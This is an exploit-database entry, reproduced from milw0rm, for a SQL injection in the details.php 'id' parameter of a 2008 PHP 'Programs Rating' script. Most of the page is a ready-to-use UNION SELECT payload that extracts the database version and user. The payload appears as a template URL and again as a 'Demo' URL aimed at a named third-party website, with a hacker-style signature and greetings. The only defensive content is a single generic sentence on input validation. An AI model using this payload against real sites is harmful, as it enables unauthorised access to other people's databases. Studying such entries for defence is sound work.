header-logo
Suggest Exploit
vendor:
N/A
by:
Hussin X
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Programs Rating (details.php id ) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable script. The crafted query can be sent as a parameter in the URL. For example, www.[target].com/Script/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

||| Programs Rating (details.php id ) Remote SQL Injection Vulnerability

||    Author: Hussin X

||   Home :  WwW.IQ-TY.CoM

||    email:  darkangel_g85[at]Yahoo[DoT]com


||| script :http://www.yourfreeworld.com/script/rating.php

||| DorK   : *_^


 Exploit
________

www.[target].com/Script/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--


 Demo
_________

http://www.downlinegoldmine.com/rating/details.php?id=-1+union+select+1,version(),3,user(),0x48757373696E5F585F5F5761735F68657265,6,7,8,9,10--




| Greetz : All my freind

# milw0rm.com [2008-11-01]